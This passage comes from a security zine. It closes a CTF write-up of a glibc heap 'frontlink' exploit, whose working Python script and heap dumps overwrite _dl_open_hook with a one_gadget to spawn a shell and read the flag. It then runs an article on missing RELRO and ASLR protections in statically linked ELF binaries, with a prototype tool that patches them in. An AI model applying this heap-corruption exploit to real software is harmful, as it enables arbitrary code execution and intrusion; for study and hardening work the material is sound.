Now that we know the address of libc and the heap, it’s time to craft our frontlink attack. First, we need to have a chunk we control in the large bin. Unfortunately, the challenge’s constraints do not let us free a chunk with a controlled size. However, we can control a freed chunk in the unsorted bin. As chunks inserted to the large bin are first removed from the unsorted bin, this provides us with a primitive which is sufficient for our needs.

We overwrite the bk of a chunk in the unsorted bin.

    info("populate unsorted bin")
    alloc_it(0)
    alloc_it(1)
    free_it(0)

    info("hijack unsorted bin")
    ## controlled chunk #1 is our leaked chunk
    controlled = chunk1_addr + 0x10
    chunk0_addr = heap_base
    write_it(0, fit(chunk(base=chunk0_addr+0x10,
                          offset=-0x10,
                          bk=controlled)),
             base=chunk0_addr+0x10)
    alloc_it(3)

    [*] populate unsorted bin
    [+] alloc 0
    [+] alloc 1
    [+] free 0
    [*] hijack unsorted bin
    [+] craft chunk(0x560a6e84c000): bk=0x560a6e84c320
    [+] write 0:
    560a6e84c010  61 61 61 61 62 61 61 61  20 c3 84 6e 0a 56 00 00
    [+] alloc 3

Here we allocated two chunks and freed the first, which inserts it into the unsorted bin. Then we overwrite the bk pointer of a chunk which starts 0x10 before the allocation of slot 0 (offset=-0x10), i.e., the chunk in the unsorted bin. When making another allocation, the chunk in the unsorted bin is removed and returned to the caller, and the bk pointer of the unsorted bin is updated to point to the bk of the removed chunk.

Now that the bk of the unsorted bin points to the controlled region in slot 1, we forge a list that has a fake chunk with size 0x400, as this size belongs in the large bin, and another chunk of size 0x310. When requesting another allocation of size 0x300, the first chunk is sorted and inserted into the large bin and the second chunk is immediately returned to the caller.

    info("populate large bin")
    write_it(1, fit(merge_dicts(
        chunk(base=controlled, offset=0x0,
              size=0x401, bk=controlled+0x30),
        chunk(base=controlled, offset=0x30,
              size=0x311, bk=controlled+0x60),
    )))
    alloc_it(3)

    [*] populate large bin
    [+] craft chunk(0x560a6e84c320): size=0x401 bk=0x560a6e84c350
    [+] craft chunk(0x560a6e84c350): size=0x311 bk=0x560a6e84c380
    [+] write 1:
    560a6e84c320  61 61 61 61 62 61 61 61  01 04 00 00 00 00 00 00
    560a6e84c330  65 61 61 61 66 61 61 61  50 c3 84 6e 0a 56 00 00
    560a6e84c340  69 61 61 61 6a 61 61 61  6b 61 61 61 6c 61 61 61
    560a6e84c350  6d 61 61 61 6e 61 61 61  11 03 00 00 00 00 00 00
    560a6e84c360  71 61 61 61 72 61 61 61  80 c3 84 6e 0a 56 00 00
    [+] alloc 3

Perfect! We have a chunk under our control in the large bin. It’s time to corrupt this chunk!

We point the bk and bk_nextsize of this chunk before the _dl_open_hook and put some more forged chunks in the unsorted bin. The first chunk will be the chunk whose address is written to _dl_open_hook, so it must have a size bigger than 0x400 yet belong in the same bin. The next chunk is of size 0x310, so it is returned to the caller after a request for an allocation of 0x300, once the 0x410 chunk has been inserted into the large bin and the attack has been performed.
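The size choices here (0x400 and 0x410 sharing a large bin, 0x310 going elsewhere) follow from how glibc maps chunk sizes to bins. As a rough check, the sketch below ports glibc's `largebin_index_64` macro to Python, assuming a 64-bit target where the small-bin range ends at 0x400. The helper `bin_kind` is a hypothetical name introduced only for this illustration.

```python
MIN_LARGE_SIZE = 0x400  # assumed 64-bit glibc: smaller sizes use small bins

def largebin_index_64(sz: int) -> int:
    """Python port of glibc's largebin_index_64 macro."""
    if (sz >> 6) <= 48:
        return 48 + (sz >> 6)
    if (sz >> 9) <= 20:
        return 91 + (sz >> 9)
    if (sz >> 12) <= 10:
        return 110 + (sz >> 12)
    if (sz >> 15) <= 4:
        return 119 + (sz >> 15)
    if (sz >> 18) <= 2:
        return 124 + (sz >> 18)
    return 126

def bin_kind(size_field: int) -> str:
    """Classify a raw size field after masking off the three low flag bits."""
    size = size_field & ~0x7
    return "large" if size >= MIN_LARGE_SIZE else "small"

for raw in (0x401, 0x411, 0x311):
    size = raw & ~0x7
    kind = bin_kind(raw)
    index = largebin_index_64(size) if kind == "large" else None
    print("{:#x}: {} bin, large bin index {}".format(raw, kind, index))
```

Under these assumptions the first large bin holds sizes 0x400 through 0x43f, which is why a 0x410 chunk lands in the same bin as the forged 0x400 chunk while still being strictly larger.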

    info("""frontlink attack: hijack
    _dl_open_hook ({:#x})""".format(
        libc.symbols['_dl_open_hook']))
    write_it(1, fit(merge_dicts(
        chunk(base=controlled, offset=0x0,
              size=0x401,
              # We don't have to use both fields to
              # overwrite _dl_open_hook. One is enough
              # but both must point to a writable
              # address.
              bk=libc.symbols['_dl_open_hook'] - 0x10,
              bk_nextsize=
                  libc.symbols['_dl_open_hook'] - 0x20),
        chunk(base=controlled, offset=0x60,
              size=0x411, bk=controlled + 0x90),
        chunk(base=controlled, offset=0x90, size=0x311,
              bk=controlled + 0xc0),
    )), base=controlled)
    alloc_it(3)

    [*] frontlink attack:
    hijack _dl_open_hook (0x7f553f4622e0)
    [+] craft chunk(0x560a6e84c320):
        size=0x401 bk=0x7f553f4622d0
        bk_nextsize=0x7f553f4622c0
    [+] craft chunk(0x560a6e84c380):
        size=0x411 bk=0x560a6e84c3b0
    [+] craft chunk(0x560a6e84c3b0):
        size=0x311 bk=0x560a6e84c3e0
    [+] write 1:
    560a6e84c320  61 61 61 61 62 61 61 61  01 04 00 00 00 00 00 00
    560a6e84c330  65 61 61 61 66 61 61 61  d0 22 46 3f 55 7f 00 00
    560a6e84c340  69 61 61 61 6a 61 61 61  c0 22 46 3f 55 7f 00 00
    560a6e84c350  6d 61 61 61 6e 61 61 61  6f 61 61 61 70 61 61 61
    560a6e84c360  71 61 61 61 72 61 61 61  73 61 61 61 74 61 61 61
    560a6e84c370  75 61 61 61 76 61 61 61  77 61 61 61 78 61 61 61
    560a6e84c380  79 61 61 61 7a 61 61 62  11 04 00 00 00 00 00 00
    560a6e84c390  64 61 61 62 65 61 61 62  b0 c3 84 6e 0a 56 00 00
    560a6e84c3a0  68 61 61 62 69 61 61 62  6a 61 61 62 6b 61 61 62
    560a6e84c3b0  6c 61 61 62 6d 61 61 62  11 03 00 00 00 00 00 00
    560a6e84c3c0  70 61 61 62 71 61 61 62  e0 c3 84 6e 0a 56 00 00
    [+] alloc 3

This allocation overwrites _dl_open_hook with the address of controlled+0x60, the address of the 0x410 chunk.

Now it’s time to hijack the flow. We overwrite offset 0x60 of the controlled chunk with one_gadget, an address that, when jumped to, executes exec("/bin/bash"). We also write an easily detectable bad size to the next chunk in the unsorted bin, then make an allocation. The allocator detects the bad size and tries to abort. The abort process invokes _dl_open_hook->dlopen_mode, which we set to be the one_gadget, and we get a shell! See Figure 16 for the code.

    [*] set _dl_open_hook->dlmode = ONE_GADGET (0x7f553f18d651)
    [*] and make the next chunk removed from the unsorted bin trigger an error
    [+] craft chunk(0x560a6e84c3e0): size=-0x1
    [+] write 1:
    560a6e84c320  61 61 61 61 62 61 61 61  63 61 61 61 64 61 61 61
    560a6e84c330  65 61 61 61 66 61 61 61  67 61 61 61 68 61 61 61
    560a6e84c340  69 61 61 61 6a 61 61 61  6b 61 61 61 6c 61 61 61
    560a6e84c350  6d 61 61 61 6e 61 61 61  6f 61 61 61 70 61 61 61
    560a6e84c360  71 61 61 61 72 61 61 61  73 61 61 61 74 61 61 61
    560a6e84c370  75 61 61 61 76 61 61 61  77 61 61 61 78 61 61 61
    560a6e84c380  51 d6 18 3f 55 7f 00 00  62 61 61 62 63 61 61 62
    560a6e84c390  64 61 61 62 65 61 61 62  66 61 61 62 67 61 61 62
    560a6e84c3a0  68 61 61 62 69 61 61 62  6a 61 61 62 6b 61 61 62
    560a6e84c3b0  6c 61 61 62 6d 61 61 62  6e 61 61 62 6f 61 61 62
    560a6e84c3c0  70 61 61 62 71 61 61 62  72 61 61 62 73 61 61 62
    560a6e84c3d0  74 61 61 62 75 61 61 62  76 61 61 62 77 61 61 62
    560a6e84c3e0  78 61 61 62 79 61 61 62  ff ff ff ff ff ff ff ff
    [*] cause an exception - chunk in unsorted bin with bad size,
    trigger _dl_open_hook->dlmode
    [+] alloc 3
    [*] flag: 34C3_but_does_your_exploit_work_on_1710_too

Voila!

    ONE_GADGET = libc.address + 0xf1651
    info("set _dl_open_hook->dlmode = ONE_GADGET ({:#x})".format(ONE_GADGET))
    info("and make the next chunk removed from the unsorted bin trigger an error")
    write_it(1, fit(merge_dicts({0x60: ONE_GADGET},
                                chunk(base=controlled, offset=0xc0, size=-1),)),
             base=controlled)

    info("""cause an exception - chunk in unsorted bin with bad size,
    trigger _dl_open_hook->dlmode""")
    alloc_it(3)

    r.recvline_contains('malloc(): memory corruption')
    r.sendline('cat flag')
    info("flag: {}".format(r.recvline()))

Figure 16. This dumps the flag!
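The listings lean on a `chunk()` helper whose definition is not shown in this part of the article. The following is a minimal sketch of what such a helper might do, assuming the standard 64-bit glibc `malloc_chunk` field layout and non-overlapping fields. The names `FIELD_OFFSETS` and `flatten` are hypothetical, the `base=` argument of the original is left out, and the filler is a constant byte rather than the cyclic pattern seen in the hex dumps.

```python
import struct

# Field offsets of a 64-bit glibc malloc_chunk, relative to the chunk start.
FIELD_OFFSETS = {
    "prev_size": 0x00, "size": 0x08, "fd": 0x10,
    "bk": 0x18, "fd_nextsize": 0x20, "bk_nextsize": 0x28,
}

def chunk(offset=0, **fields):
    """Return {buffer_offset: qword} for the requested chunk fields."""
    return {offset + FIELD_OFFSETS[name]: value
            for name, value in fields.items()}

def flatten(layout, filler=b"A"):
    """Serialize a {offset: qword} dict to bytes, padding gaps with filler."""
    out = bytearray()
    for off in sorted(layout):
        out += filler * (off - len(out))
        # Mask so that a size of -1 becomes eight 0xff bytes.
        out += struct.pack("<Q", layout[off] & 0xFFFFFFFFFFFFFFFF)
    return bytes(out)

# Rebuild the "populate large bin" write from the log.
controlled = 0x560A6E84C320
layout = {}
layout.update(chunk(offset=0x00, size=0x401, bk=controlled + 0x30))
layout.update(chunk(offset=0x30, size=0x311, bk=controlled + 0x60))
payload = flatten(layout)

print(payload.hex())
```

Comparing the non-filler qwords with the "write 1" dump of the large bin step shows the same values at the same offsets: sizes at +0x08 and +0x38, bk pointers at +0x18 and +0x48.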

Closing Words
Glibc malloc’s insecurity is a never ending story. The inline-metadata approach keeps presenting new opportunities for exploiters. (Take a look at the new tcache thing in version 2.26.) And even the old ones, as we learned today, are not mitigated. They are just there, floating around, waiting for any UAF or overflow. Maybe it’s time to change the design of libc altogether.

Another important lesson we learned is to always check the details. Reading the source or disassembly yourself takes courage and persistence, but fortune prefers the brave. Double check the mitigations. Re-read the old materials. Some things that at the time were considered useless and forgotten may prove valuable in different situations. The past, like the future, holds many surprises.

18:06 RelroS: Read Only Relocations for Static ELF
by Ryan “ElfMaster” O’Neill

This paper is going to shed some light on the more obscure security weaknesses of statically linked executables: the glibc initialization process, what the attack surface looks like, and why the security mitigation known as RELRO is just as important for static executables as it is for dynamic executables. We will discuss some solutions, and explore the experimental software that I have presented as a solution for enabling RELRO in binaries that are statically linked, usually to avoid complex dependency issues. We will also take a look at ASLR, and innovate a solution for making it work on statically linked executables.

Standard ELF Security Mitigations

Over the years there have been some innovative and progressive overhauls that have been incorporated into glibc, the linker, and the dynamic linker, in order to make certain security mitigations possible. Firstly there was Pipacs, who decided that ELF programs that would otherwise be ET_EXEC (executables) could benefit from becoming ET_DYN objects, which are shared libraries. If a PT_INTERP segment is added to an ET_DYN object to specify an interpreter, then ET_DYN objects can be linked as executable programs which are position independent executables, “-fPIC -pie”, and linked with an address space that begins at 0x0. This type of executable has no real absolute address space until it has been relocated into a randomized address space by the kernel. A PIE executable uses IP relative addressing mode so that it can avoid using absolute addresses; consequently, a program that is an ELF ET_DYN can make full use of ASLR.

(ASLR can work with ET_EXEC’s with PaX using a technique called VMA mirroring,29 but I can’t say for sure if it’s still supported and it was never the preferred method.)

When an executable runs privileged, such as sshd, it would ideally be compiled and linked into a PIE executable which allows for runtime relocation to a random address space, thus hardening the attack surface into far more hostile playing grounds. Try running readelf -e /usr/sbin/sshd | grep DYN and you will see that it is (most likely) built this way.

Somewhere along the way came RELRO (read-only relocations), a security mitigation technique that has two modes: partial and full. By default only partial RELRO is enforced, because full RELRO requires strict linking, which has less efficient program loading time due to the dynamic linker binding/relocating immediately (strict) vs. lazy. But full RELRO can be very powerful for hardening the attack surface by marking specific areas in the data segment as read-only, specifically the .init_array, .fini_array, .jcr, .got, and .got.plt sections. The .got.plt section and .fini_array are the most frequent targets for attackers since these contain function pointers into shared library routines and destructor routines, respectively.

What about static linking?

Developers like statically linked executables because they are easier to manage, debug, and ship; everything is self contained. The chances of a user running into issues with a statically linked executable are far less than with a dynamically linked executable which requires dependencies, sometimes hundreds of them. I’ve been aware of this for some time, but I was remiss to think that statically linked executables don’t suffer from the same ELF security problems as dynamically linked executables! To my surprise, a statically linked executable is vulnerable to many of the same attacks as a dynamically linked executable, including shared library injection, .dtors (.fini_array) poisoning, and PLT/GOT poisoning.

This might surprise you; shouldn’t a static executable be immune to relocation table tricks? Let’s start with shared library injection. A shared library can be injected into the process address space using ptrace injected shellcode for malware purposes. However, if full RELRO is enabled coupled with PaX mprotect restrictions, this becomes impossible, since the PaX feature prevents the default behavior of allowing ptrace to write to read-only segments and full RELRO would ensure read-only protections on the relevant data segment areas. Now, from an exploitation standpoint this becomes more interesting when you realize that the PLT/GOT is still a thing in statically linked executables, and we will discuss it shortly, but in the meantime just know that the PLT/GOT contains function pointers to libc routines. The .init_array/.fini_array function pointers respectively point to initialization and destructor routines. Specifically .dtors has been used to achieve code execution in many types of exploits, although I doubt its abuse is as ubiquitous as that of the .got.plt section itself. Let’s take a tour of a statically linked executable and analyze the finer points of the security mitigations, both present and absent, that should be considered before choosing to statically link a program that is sensitive or runs privileged.

Demystifying the Ambiguous

The static binary in Figure 17 was built with full RELRO flags, gcc -static -Wl,-z,relro,-z,now. And even the savvy reverser might be fooled into thinking that RELRO is in fact enabled. Partial RELRO and full RELRO are both incompatible with statically compiled binaries at this point in time, because the dynamic linker is responsible for re-mapping and mprotecting the common attack points within the data segment, such as the PLT/GOT, and as shown in Figure 17 there is no PT_INTERP to specify an interpreter, nor would we expect to see one in a statically linked binary. The default linker script is what directs the linker to create the GNU_RELRO segment, even though it serves no current purpose.

Notice that the GNU_RELRO segment points to the beginning of the data segment, which is usually where you would want the dynamic linker to mprotect n bytes as read-only. However, we really don’t want .tdata marked as read-only, as that will prevent multi-threaded applications from working. So this is just another indication that the statically built binary does not actually have any plans to enable RELRO on itself. Alas, it really should, as the PLT/GOT and other areas such as .fini_array are as vulnerable as ever. A common tool named checksec.sh uses the GNU_RELRO segment as one of the markers to denote whether or not RELRO is enabled on a binary,30 and in the case of statically compiled binaries it will report that partial RELRO is enabled, because it cannot find a DT_BIND_NOW dynamic segment flag since there are no dynamic segments in statically linked executables. Let’s take a lightweight tour through the init code of a statically compiled executable.

From the output in Figure 17, you will notice that there is a .got and .got.plt section within the data segment. To enable full RELRO these are normally merged into one section, but for our purposes that is not necessary since the tool I designed, relros, marks both of them as read-only.

Overview of Statically Linked ELF

A high level overview can be seen with the ftrace tool, shown in Figure 18.31

Most of the heavy lifting that would normally take place in the dynamic linker is performed by the function generic_start_main(), which in addition to other tasks also performs various relocations and fixups to all the many sections in the data segment, including the .got.plt section. You can set up a few watch points to observe that early on there is a function that inquires about CPU information such as the CPU cache size, which allows glibc to intelligently determine which version of a given function, such as strcpy(), should be used.

In Figure 19, we set watch points on the GOT entries for several shared library routines and notice that generic_start_main() serves, in some sense, much like a dynamic linker. Its job is largely to perform relocations and fixups.

So in both cases the GOT entry for a given libc function had its PLT stub address replaced with the most efficient version of the function given the CPU cache size looked up by certain glibc init code (i.e. __cache_sysconf()). Since this is a somewhat high level overview I will not go into every function, but the important thing is to see that the PLT/GOT is updated with a libc function, and can be poisoned, especially since RELRO is not compatible with statically linked executables. This leads us into the solution, or possible solutions, including our very own experimental prototype named relros, which uses some ELF trickery to inject code that is called by a trampoline that has been placed in a very specific spot. It is necessary to wait until generic_start_main() has finished all of its writes to the memory areas that we intend to mark as read-only before we invoke our enable_relro() routine.

29 VMA Mirroring by PaX Team: unzip pocorgtfo18.pdf vmmirror.txt
30 unzip pocorgtfo18.pdf checksec.sh # http://www.trapkit.de/tools/checksec.html
31 git clone https://github.com/elfmaster/ftrace

    $ gcc -static -Wl,-z,relro,-z,now test.c -o test
    $ readelf -l test

    Elf file type is EXEC (Executable file)
    Entry point 0x4008b0
    There are 6 program headers, starting at offset 64

    Program Headers:
      Type           Offset             VirtAddr           PhysAddr
                     FileSiz            MemSiz              Flags  Align
      LOAD           0x0000000000000000 0x0000000000400000 0x0000000000400000
                     0x00000000000cbf67 0x00000000000cbf67  R E    200000
      LOAD           0x00000000000cceb8 0x00000000006cceb8 0x00000000006cceb8
                     0x0000000000001cb8 0x0000000000003570  RW     200000
      NOTE           0x0000000000000190 0x0000000000400190 0x0000000000400190
                     0x0000000000000044 0x0000000000000044  R      4
      TLS            0x00000000000cceb8 0x00000000006cceb8 0x00000000006cceb8
                     0x0000000000000020 0x0000000000000050  R      8
      GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000
                     0x0000000000000000 0x0000000000000000  RW     10
      GNU_RELRO      0x00000000000cceb8 0x00000000006cceb8 0x00000000006cceb8
                     0x0000000000000148 0x0000000000000148  R      1

     Section to Segment mapping:
      Segment Sections...
       00     .note.ABI-tag .note.gnu.build-id .rela.plt .init .plt .text
              __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata
              __libc_subfreeres __libc_atexit .stapsdt.base
              __libc_thread_subfreeres .eh_frame .gcc_except_table
       01     .tdata .init_array .fini_array .jcr .data.rel.ro .got .got.plt
              .data .bss __libc_freeres_ptrs
       02     .note.ABI-tag .note.gnu.build-id
       03     .tdata .tbss
       04
       05     .tdata .init_array .fini_array .jcr .data.rel.ro .got

Figure 17. RELRO is Broken for Static Executables
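The mismatch that Figure 17 illustrates can also be checked mechanically. The sketch below, which assumes a little-endian ELF64 image held in memory, lists the program header types and contrasts a header-only verdict with the question of whether anything would actually enforce the protection. Both `naive_relro_verdict` and `relro_can_be_enforced` are hypothetical helpers written for this illustration; they are not how checksec.sh or relros are implemented.

```python
import struct

PT_LOAD, PT_DYNAMIC, PT_INTERP = 1, 2, 3
PT_GNU_RELRO = 0x6474E552

def program_header_types(elf: bytes) -> list:
    """Return the p_type of every program header in a little-endian ELF64."""
    if elf[:4] != b"\x7fELF" or elf[4] != 2 or elf[5] != 1:
        raise ValueError("expected a little-endian ELF64 file")
    (e_phoff,) = struct.unpack_from("<Q", elf, 0x20)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 0x36)
    return [struct.unpack_from("<I", elf, e_phoff + i * e_phentsize)[0]
            for i in range(e_phnum)]

def naive_relro_verdict(types) -> str:
    """Header-only check: trusts PT_GNU_RELRO without asking who enforces it."""
    return "relro segment present" if PT_GNU_RELRO in types else "no relro"

def relro_can_be_enforced(types) -> bool:
    """With no PT_INTERP or PT_DYNAMIC, no dynamic linker will mprotect it."""
    return (PT_GNU_RELRO in types and PT_INTERP in types
            and PT_DYNAMIC in types)
```

A typical use would be `types = program_header_types(open(path, "rb").read())`. For the header set in Figure 17 (two LOADs, NOTE, TLS, GNU_STACK, GNU_RELRO) the first helper reports a RELRO segment while the second returns False.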

    $ ftrace test_binary
    LOCAL_call@0x404fd0: __libc_start_main()
    LOCAL_call@0x404f60: get_common_indeces.constprop.1()
    (RETURN VALUE) LOCAL_call@0x404f60: get_common_indeces.constprop.1() = 3
    LOCAL_call@0x404cc0: generic_start_main()
    LOCAL_call@0x447cb0: _dl_aux_init() (RETURN VALUE) LOCAL_call@0x447cb0:
        _dl_aux_init() = 7ffec5360bf9
    LOCAL_call@0x4490b0: _dl_discover_osversion(0x7ffec5360be8)
    LOCAL_call@0x46f5e0: uname() LOCAL_call@0x46f5e0: __uname()
    <truncated>

Figure 18. FTracing a Static ELF

    (gdb) x/gx 0x6d0018 /* .got.plt entry for strcpy */
    0x6d0018: 0x000000000043f600
    (gdb) watch *0x6d0018
    Hardware watchpoint 3: *0x6d0018
    (gdb) x/gx /* .got.plt entry for memmove */
    0x6d0020: 0x0000000000436da0
    (gdb) watch *0x6d0020
    Hardware watchpoint 4: *0x6d0020
    (gdb) run
    The program being debugged has been started already.
    Start it from the beginning? (y or n) y
    Starting program: /home/elfmaster/git/libelfmaster/examples/static_binary

    Hardware watchpoint 4: *0x6d0020

    Old value = 4195078
    New value = 4418976
    0x0000000000404dd3 in generic_start_main ()
    (gdb) x/i 0x436da0
    0x436da0 <__memmove_avx_unaligned>: mov %rdi,%rax
    (gdb) c
    Continuing.

    Hardware watchpoint 3: *0x6d0018

    Old value = 4195062
    New value = 4453888
    0x0000000000404dd3 in generic_start_main ()
    (gdb) x/i 0x43f600
    0x43f600 <__strcpy_sse2_unaligned>: mov %rsi,%rcx
    (gdb)

Figure 19. Exploring a Static ELF with GDB
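GDB prints the watchpoint values in decimal, which hides the fact that they are addresses. A small conversion, using only the numbers from the session in Figure 19, makes the before and after easier to read. The dictionary name `transitions` is just an illustrative choice.

```python
# Watchpoint values copied from the GDB session (printed there in decimal).
transitions = {
    "memmove": (4195078, 4418976),
    "strcpy": (4195062, 4453888),
}

for name, (old, new) in transitions.items():
    print("{}: {:#x} -> {:#x}".format(name, old, new))

# Distance between the two old values, i.e. between the two initial targets.
stub_gap = transitions["memmove"][0] - transitions["strcpy"][0]
print("gap between old values: {:#x}".format(stub_gap))
```

The new values match the addresses disassembled in the figure (0x436da0 and 0x43f600). The old values sit 0x10 apart just above the text base, which fits the description of the entries initially holding PLT stub addresses.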

A Second Implementation

My first prototype had to be written quickly due to time constraints. This current implementation uses an injection technique that marks the PT_NOTE program header as PT_LOAD, and we therefore effectively create a second text segment.

In the generic_start_main() function (Figure 20) there is a very specific place that we must patch, and it requires exactly a five byte patch (call <imm>). As immediate calls do not work when transferring execution to a different segment, an lcall (far call) is needed, which is considerably more than five bytes. The solution to this is to switch to a reverse text infection which will keep the enable_relro() code within the one and only code segment. Currently though we are being crude and patching the code that calls main().

Currently we are overwriting six bytes at 0x405b54 with a push $enable_relro; ret set of instructions, shown in Figure 21. Our enable_relro() function mprotects the part of the data segment denoted by PT_GNU_RELRO as read-only, then calls main(), then sys_exits. This is flawed since none of the deinitialization routines get called. So what is the solution?

Like I mentioned earlier, we keep the enable_relro() code within the main program’s text segment using a reverse text extension, or a text padding infection. We could then simply overwrite the five bytes at 0x405b4f with a call <offset> to enable_relro() and then that function would make sure we return the address of main(), which would obviously be stored in %rax. This is perfect since the next instruction is callq *%rax, which would call main() right after RELRO has been enabled, and no instructions are thrown out of alignment. So that is the ideal solution, although it doesn’t yet handle the problem of .tdata being at the beginning of the data segment, which is a problem for us since we can only use mprotect on memory areas that are multiples of a PAGE_SIZE.

A more sophisticated set of steps must be taken in order to get multi-threaded applications working with RELRO using binary instrumentation. Other solutions might use linker scripts to put the thread data and bss into their own data segment.

Notice how we patch the instruction bytes starting at 0x405b54 with a push/ret sequence, corrupting subsequent instructions. Nonetheless this is the prototype we are stuck with until I have time to make some changes.

--------

So let’s take a look at this RelroS application.32 33 First we see that this is not a dynamically linked executable.

    $ readelf -d test
    There is no dynamic section in this file.

We observe that there is only a r+x text segment, and a r+w data segment, with a lack of read-only memory protections on the first part of the data segment.

    $ ./test &
    [1] 27891
    $ cat /proc/`pidof test`/maps
    00400000-004cc000 r-xp 00000000 fd:01 4856460 /home/elfmaster/test
    006cc000-006cf000 rw-p 000cc000 fd:01 4856460 /home/elfmaster/test
    ...

We apply RelroS to the executable with a single command.

    $ ./relros ./test
    injection size: 464
    main(): 0x400b23

We observe that read-only relocations have been enforced by our patch that we instrumented into the binary called test.

    $ ./test &
    [1] 28052
    $ cat /proc/`pidof test`/maps
    00400000-004cc000 r-xp 00000000 fd:01 10486089 /home/elfmaster/test
    006cc000-006cd000 r--p 000cc000 fd:01 10486089 /home/elfmaster/test
    006cd000-006cf000 rw-p 000cd000 fd:01 10486089 /home/elfmaster/test
    ...

Notice after we applied relros on ./test, it now has a 4096-byte area in the data segment that has been marked as read-only. This is what the dynamic linker accomplishes for dynamically linked executables.

32 Please note that it uses libelfmaster which is not officially released yet. The use of this library is minimal, but you will need to rewrite those portions if you intend to run the code.


33 unzip pocorgtfo18.pdf relros.c
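The 4096-byte read-only mapping follows from page granularity: mprotect works on whole pages, so the GNU_RELRO range has to be widened to page boundaries. A minimal sketch of that rounding is shown below, assuming 4 KiB pages and assuming the GNU_RELRO values from Figure 17 belong to the same binary as the maps output. The function name `relro_page_range` is hypothetical, and rounding outward is this sketch's choice rather than a statement about what relros.c does.

```python
PAGE_SIZE = 0x1000  # assumed 4 KiB pages, as on x86-64 Linux

def relro_page_range(vaddr: int, memsz: int, page: int = PAGE_SIZE):
    """Round a segment outward to whole pages; returns (start, length)."""
    start = vaddr & ~(page - 1)
    end = (vaddr + memsz + page - 1) & ~(page - 1)
    return start, end - start

# GNU_RELRO VirtAddr and MemSiz from the readelf output in Figure 17.
start, length = relro_page_range(0x6CCEB8, 0x148)
print("mprotect({:#x}, {:#x}, PROT_READ)".format(start, length))
```

Under these assumptions the range is 0x6cc000 through 0x6cd000, matching the r--p line in the maps output. Since the page starts below 0x6cceb8, anything else sharing that page is covered as well, which is the granularity problem the text raises for .tdata.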

    405b46: 48 8b 74 24 10    mov 0x10(%rsp),%rsi
    405b4b: 8b 7c 24 0c       mov 0xc(%rsp),%edi
    405b4f: 48 8b 44 24 18    mov 0x18(%rsp),%rax    /* store main() addr */
    405b54: ff d0             callq *%rax            /* call main() */
    405b56: 89 c7             mov %eax,%edi
    405b58: e8 b3 de 00 00    callq 413a10 <exit>

Figure 20. Unpatched generic_start_main().

    405b46: 48 8b 74 24 10    mov 0x10(%rsp),%rsi
    405b4b: 8b 7c 24 0c       mov 0xc(%rsp),%edi
    405b4f: 48 8b 44 24 18    mov 0x18(%rsp),%rax
    405b54: 68 f4 c6 0f 0c    pushq $0xc0fc6f4
    405b59: c3                retq
    /*
     * The following bad instructions are never crashed on because
     * the previous instruction returns into enable_relro() which calls
     * main() on behalf of this function, and then sys_exit's out.
     */
    405b5a: de 00             fiadd (%rax)
    405b5c: 00 39             add %bh,(%rcx)
    405b5e: c2 0f 86          retq $0x860f
    405b61: fb                sti
    405b62: fe                (bad)
    405b63: ff                (bad)
    405b64: ff                (bad)

Figure 21. Patched generic_start_main().
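The byte counts in Figures 20 and 21 come straight from the x86-64 encodings: a push imm32 followed by ret takes six bytes, while a near call with a 32-bit relative displacement takes five. The sketch below encodes both and checks them against bytes visible in the figures. The function names are hypothetical, and this is not code taken from relros.c.

```python
import struct

def push_ret(target: int) -> bytes:
    """6-byte absolute trampoline: pushq $imm32 ; retq."""
    # pushq sign-extends its 32-bit immediate, so target must fit in 31 bits.
    if not 0 <= target < 0x80000000:
        raise ValueError("target does not fit a push imm32")
    return b"\x68" + struct.pack("<I", target) + b"\xc3"

def call_rel32(site: int, target: int) -> bytes:
    """5-byte near call: e8 + displacement from the next instruction."""
    return b"\xe8" + struct.pack("<i", target - (site + 5))

# Patch bytes from Figure 21, and the existing call to exit() in Figure 20.
print(push_ret(0xC0FC6F4).hex())
print(call_rel32(0x405B58, 0x413A10).hex())
```

The first line reproduces the `68 f4 c6 0f 0c c3` patch and the second the original `e8 b3 de 00 00`. The rel32 form only reaches targets within about 2 GiB of the call site, but it needs one byte less, which is what lets a five-byte patch fit over a single five-byte instruction.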

--------

So what are some other potential solutions for enabling RELRO on statically linked executables? Aside from my binary instrumentation project that will improve in the future, this might be fixed either by tricky linker scripts or by the glibc developers.

Write a linker script that places .tbss, .tdata, and .data in their own segment, and place the sections that you want read-only in another segment. These sections include .init_array, .fini_array, .jcr, .dynamic, .got, and .got.plt. Both of these PT_LOAD segments will be marked as PF_R|PF_W (read+write), and serve as two separate data segments. A program can then have a custom function (but not a constructor) that is called by main() before it even checks argc and argv. The reason we don’t want a constructor function is that it would attempt to mprotect read-only permissions on the second data segment before the glibc init code has finished performing its fixups, which require write access. This is because the constructor routines stored in the .init section are called before the write instructions to the .got, .got.plt sections, etc.

The glibc developers should probably add a function that is invoked by generic_start_main() right before main() is called. You will notice there is a _dl_protect_relro() function in statically linked executables that is never called.

ASLR Issues

ASLR requires that an executable is ET_DYN unless VMA mirroring is used for ET_EXEC ASLR. A statically linked executable can only be linked as an ET_EXEC type executable.

    $ gcc -static -fPIC -pie test2.c -o test2
    ld: x86_64-linux-gnu/5/crtbeginT.o:
    relocation R_X86_64_32 against `__TMC_END__'
    can not be used when making a shared object;
    recompile with -fPIC
    x86_64-linux-gnu/5/crtbeginT.o: error adding
    symbols: Bad value
    collect2: error: ld returned 1 exit status

This means that you can remove the -pie flag and end up with an executable that uses position independent code. But it does not have an address space layout that begins with base address 0, which is what we need. So what to do?

ASLR Solutions

I haven’t personally spent enough time with the linker to see if it can be tweaked to link a static executable that comes out as an ET_DYN object, which should also not have a PT_INTERP segment since it is not dynamically linked. A quick peek in src/linux/fs/binfmt_elf.c, shown in Figure 22, will show that the executable type must be ET_DYN.

A Hybrid Solution

The linker may not be able to perform this task yet, but I believe we can. A potential solution exists in the idea that we can at least compile a statically linked executable so that it uses position independent code (IP relative), although it will still maintain an absolute address space. So here is the algorithm from a binary instrumentation standpoint.

First we’ll compile the executable with -static -fPIC, then static_to_dyn.c adjusts the executable. First it changes the ehdr->e_type from ET_EXEC to ET_DYN. It then modifies the phdrs for each PT_LOAD segment, setting phdr[TEXT].p_vaddr and .p_offset to zero, and phdr[DATA].p_vaddr to 0x200000 + phdr[DATA].p_offset. It sets ehdr->e_entry to ehdr->e_entry - old_base. Finally, it updates each section header to reflect the new address range, so that GDB and objdump can work with the binary.

    $ gcc -static -fPIC test2.c -o test2
    $ ./static_to_dyn ./test2
    Setting e_entry to 8b0
    $ ./test2
    Segmentation fault (core dumped)

